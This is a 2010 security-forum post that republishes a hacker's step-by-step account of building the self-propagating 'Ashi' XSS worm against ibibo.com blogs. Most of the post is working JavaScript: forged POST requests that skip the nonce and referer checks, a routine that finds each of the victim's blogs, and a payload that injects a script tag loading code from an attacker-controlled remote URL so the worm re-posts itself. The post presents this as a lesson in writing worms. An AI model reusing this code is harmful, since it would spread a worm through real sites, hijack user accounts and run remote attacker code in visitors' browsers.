• Demystifying The Ashi virus--"vinnu"

    by
    prashant_uniyal
    Rate this article
    Published on 08-25-2010 05:08 PM  Number of Views: 653  
    1 Comment Comments
    Ashi Virus was developed by "vinnu" bhai last year. It was a perfect example of a self propogating virus. Let me post here his original paper. It will give us better view on making worms/virus and also their capabilities.

    Vulnerability:- I found several XSS vulnerabilities in ibibo.com. Next, i searched for any good point which can give me a point to autmate the leveraging process. I found two php pages post.php and new-post.php, which can submit my blog posts and bothe the title as well as the content were prone to XSS. So i developed a script to find out the form elements:

    javascript:var vin=document.getElementsByTagName("form")[0];var nunnu;for(var iter=0;iter<vin.length;iter++){if(iter==0){nunnu=v in.item(iter).name+"="+vin.item(iter).value;}else{ nunnu+="&"+vin.item(iter).name+"="+vin.item(iter). value;}}alert(nunnu);

    The above script retrieves the form elements and their values.So now i had the script (you have to alter above script a little to increase the form index to a suitable value to reach the target form as:

    javascript:var vin=document.getElementsByTagName("form")[2];var nunnu;for(var iter=0;iter<vin.length;iter++){if(iter==0){nunnu=v in.item(iter).name+"="+vin.item(iter).value;}else{ nunnu+="&"+vin.item(iter).name+"="+vin.item(iter). value;}}alert(nunnu);

    Paste above script in address-bar of the browser when the "http://blogs.ibibo.com/<your-blog>/wp-admin/"
    Page will open. I wrote "Namaste" in title & "Hows the life there" in content box. It gave me following in a dialogue
    box:
    post_title=Namaste&content=Hows the life there&tags_input=&action=post-quickpress-save&quickpress_post_ID=0
    &_wpnonce=3a7721d78d&_wp_http_referer=/vulnerable/wp-admin/&save=Save Draft&=Cancel&publish=Publish

    It seems like they are checking the referer (_wp_http_referer)and a nonce [_wpnonce] (well nonce is always the same everytimeI tried to post).But still the nonce appears in a page which cannot be directly XSSed. So i just tried to post the request without the referer and nonce.

    javascript:blog(); function blog(){var nunnu="><scr"+"ipt language=javascript"+"src='http://sites.google.com/site/urcontrolledsite/ibibo.js'>"+"<scr"+"ipt>";quote="Sahdi bhasa sahdi jaan hai ji, tusaan sunhsaa...";varblpayload="post_title="+quote;alert (nunnu);blpayload+=encodeURIComponent(nunnu);bl
    payload+="&content=Jaijeya";blpayload+=encodeURICo mponent(nunnu);blpayload+="hor&t
    ags_input=&action=post-quickpresssave&
    quickpress_post_ID=0&_wpnonce=&_wp_http_referer=&s ave=Save
    %20Draft&=Cancel&publish=Publish";alert(blpayload) ;ajaxPSLV("http://blogs.ibibo.co
    m/vulnerable/wp-admin/post.php",blpayload);}function ajaxPSLV(url, payload)
    { alert("url:\t"+url+"\npayload:\n"+payload);var xmlhttp; if
    (window.XMLHttpRequest) {xmlhttp = new XMLHttpRequest(); }else if
    (window.ActiveXObject) {try {xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");}
    catch (e) { try {xmlhttp = new
    ActiveXObject("Msxml2.XMLHTTP");} catch (e) { return;}
    } } alert("sending");xmlhttp.open("POST", url,
    true);xmlhttp.setRequestHeader("Content-Type", "application/x-www-formurlencoded");
    xmlhttp.setRequestHeader("Content-length",
    payload.length);alert("sending:\t"+payload.length) ;xmlhttp.send(payload);alert("se
    nt");}alert("done");

    It worked and it posted the blog even without the nonce and referer defined in querystring. But there is a problem.
    The script is appearing on the heading and also I wanted the script to post a different topic everytime it gets executed so i introduced the well known following circuit for chosing one of strings out of a list:

    var no=Math.floor(Math.random()*10);
    var quote=new Array(10);
    quote[0]="Sahdi bhasa sahdi jaan...";
    quote[1]="Don't you think we can...";
    quote[2]="Thats the attitude...Keep it up.";
    quote[3]="Intelligent?..";
    quote[4]="Main koi machine thodi hai...";
    quote[5]="Jaijeya ji! Theek hainn na?...";
    quote[6]="Veero! Tusaan Eh bhi parhi leya";
    quote[7]="Himachal a heaven...";
    quote[8]="Free Tibet...";
    quote[9]="Pahari (Kangri) dialoge must be respected and registered as a
    language...";
    var blpayload="post_title="+quote[no];

    After assembling it with above script i got the following code:

    javascript:blog();
    function blog(){
    var nunnu="><scr"+"ipt language=javascript"+"
    src='http://sites.google.com/site/urcontrolledsite/ibibo.js'>"+"</scr"+"ipt><a
    href=\"\" onmouseover=javascript:blog();>Jaijeya</a><a ";
    var no=Math.floor(Math.random()*10);
    var quote=new Array(10);
    quote[0]="Sahdi bhasa sahdi jaan...";
    quote[1]="Don't you think we can...";
    quote[2]="Thats the attitude...Keep it up.";
    quote[3]="Intelligent?..";
    quote[4]="Main koi machine thodi hai...";
    quote[5]="Jaijeya ji! Theek hainn na?...";
    quote[6]="Veero! Tusaan Eh bhi parhi leya";
    quote[7]="Himachal a heaven...";
    quote[8]="Free Tibet...";
    quote[9]="Pahari (Kangri) dialoge must be respected and registered as a
    language...";
    var blpayload="post_title="+quote[no];
    blpayload+=encodeURIComponent(nunnu);
    blpayload+="&content=Jaijeya</p></div";
    blpayload+=encodeURIComponent(nunnu);
    blpayload+="hor&tags_input=&action=post-quickpresssave&
    quickpress_post_ID=0&_wpnonce=&_wp_http_referer=&s ave=Save
    %20Draft&=Cancel&publish=Publish";
    alert(blpayload); ajaxPSLV("http://blogs.ibibo.com/vulnerable/wpadmin/
    post.php",blpayload);
    } function ajaxPSLV(url, payload) {
    alert("url:\t"+url+"\npayload:\n"+payload);
    var xmlhttp; if (window.XMLHttpRequest){
    xmlhttp = new XMLHttpRequest();} else if (window.ActiveXObject){
    try{xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");}catch(e){
    try{xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");}catch(e){
    return;}}}alert("sending");xmlhttp.open("POST", url, true);
    xmlhttp.setRequestHeader("Content-Type","application/x-www-formurlencoded");
    xmlhttp.setRequestHeader("Content-length", payload.length);
    alert("sending:\t"+payload.length);
    xmlhttp.send(payload);alert("sent");
    }alert("done");

    But i don't want my worm to just post in a hardcoded blog. It must search for all the blogs of the user and inject the posts as the above post did.To do this i have to check hrefs of all the anchors. Because The blog names are appearing within the page and when we click on any one the respective blog changes.

    javascript:var vin=document.getElementsByTagName("a");var nunn="";for(var i=0;i<vin.length;i++){nunn+=vin[i].href+"\n";}alert(nunn);

    But there are also several other items along with blogs.So my virus must identify the blogs out of other objects.
    I checked the pattern.After a careful inspection, I found that the hrefs which has wp-admin in their href are the references of blogs of the user. So i developed another script to check and it:

    javascript:test();
    function test() {
    var list="";
    var vin=document.getElementsByTagName("a");
    var total=0;var index=0;var address;
    var intex=0;
    for(var iter=0;iter<vin.length;iter++){
    if((index=vin[iter].href.indexOf("wp-admin"))!=-1){
    address=vin[iter].href.substring(0,index+8)+"/post.php";
    list += address+"\n";intex++;
    }}alert(intex+"\n"+list);}

    Now, i have got a way to identify the blogs out of other objects and post the random topics.By combining these all a beast started to take the shape as:

    javascript:trigger();
    function trigger() {
    var vin=document.getElementsByTagName("a");
    var total=0;var index=0;var address;
    for(var iter=0;iter<vin.length;iter++){
    if((index=vin[iter].href.indexOf("wp-admin"))!=-1){
    address=vin[iter].href.substring(0,index+8)+"/post.php";
    blog(address);
    }}}
    function blog(addr){
    var nunnu="><scr"+"ipt language=javascript"+"
    src='http://sites.google.com/site/urcontrolledsite/ibibo.js'>"+"</scr"+"ipt><a
    href=\"\" onmouseover=javascript:blog();>Jaijeya</a><a ";
    var no=Math.floor(Math.random()*10);
    var quote=new Array(10);
    quote[0]="Sahdi bhasa sahdi jaan...";
    quote[1]="Don't you think we can...";
    quote[2]="Thats the attitude...Keep it up.";
    quote[3]="Intelligent?..";
    quote[4]="Main koi machine thodi hai...";
    quote[5]="Jaijeya ji! Theek hainn na?...";
    quote[6]="Veero! Tusaan Eh bhi parhi leya";
    quote[7]="Himachal a heaven...";
    quote[8]="Free Tibet...";
    quote[9]="Pahari (Kangri) dialoge must be respected and registered as a
    language...";
    var blpayload="post_title="+quote[no];
    blpayload+=encodeURIComponent(nunnu);
    blpayload+="&content=Jaijeya</p></div";
    blpayload+=encodeURIComponent("><"+"sc"+"ript language=javascript>var
    ashi='"+nunnu+"';eval(ashi);<"+"/sc"+"ript>");
    blpayload+="hor&tags_input=&action=post-quickpresssave&
    quickpress_post_ID=0&_wpnonce=&_wp_http_referer=&s ave=Save
    %20Draft&=Cancel&publish=Publish";
    alert(blpayload); ajaxPSLV(addr,blpayload);
    }
    function ajaxPSLV(url, payload) {
    alert("url:\t"+url+"\npayload:\n"+payload);
    var xmlhttp; if (window.XMLHttpRequest){
    xmlhttp = new XMLHttpRequest();} else if (window.ActiveXObject){
    try{xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");}catch(e){
    try{xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");}catch(e){
    return;}}}alert("sending");xmlhttp.open("POST", url, true);
    xmlhttp.setRequestHeader("Content-Type","application/x-www-formurlencoded");
    xmlhttp.setRequestHeader("Content-length", payload.length);
    alert("sending:\t"+payload.length);
    xmlhttp.send(payload);alert("sent");
    };

    But i thought the title was not a good place to inject the code as it will appear in dashboard. So I placed the code in the argument of post.php named "content" instead of "post_title".The variable "nunnu" contains the code for a script which retrieves the remote javascript file at:
    http://sites.google.com/site/urcontrolledsite/ibibo.js
    This article was originally published in blog: Demystifying The Ashi virus--"vinnu" started by prashant_uniyal
    Comments 1 Comment
    1. soul301's Avatar
      soul301 - 02-03-2012, 11:33 AM


      great .. awesome work.. nice and hatts off to u guys

  • G4H Twitter

  • Latest Posts

    amolnaik4

    Research Resources for MS SharePoint

    This page contains research notes on Microsoft’s SharePoint MOSS and WSS.

    Link:
    https://www.owasp.org/index.php/Research_for_SharePoint_%28MOSS%29

    amolnaik4 Today, 12:25 PM Go to last post
    b0nd

    Lolz, with the title "About Admin" I thought...

    Lolz, with the title "About Admin" I thought Admins of garage have been exposed ;)

    @hazard74, there is always a proper "way" to ask - you need to discover that. It's not that Pentesters don't have...

    b0nd Today, 09:10 AM Go to last post
    hazard74

    Ok, Anant Shrivastava. Im Sorry :)

    Ok, Anant Shrivastava.

    Im Sorry :)

    hazard74 Yesterday, 06:19 PM Go to last post
    Anant Shrivastava

    not exactly this format but a simmilar kind of a...

    not exactly this format but a simmilar kind of a format i have seen as part of malware. This url format was used to get the commands from the remote server. there was a whole bunch of domain names in...

    Anant Shrivastava Yesterday, 05:30 PM Go to last post
    Immaturedevil

    Hi Neo, Thanks for your comment. I have...

    Hi Neo,

    Thanks for your comment. I have already done that... but no success..as these URLs are not recognized by search engines as such. getting some info if anyone has come across with URLs in...

    Immaturedevil Yesterday, 05:21 PM Go to last post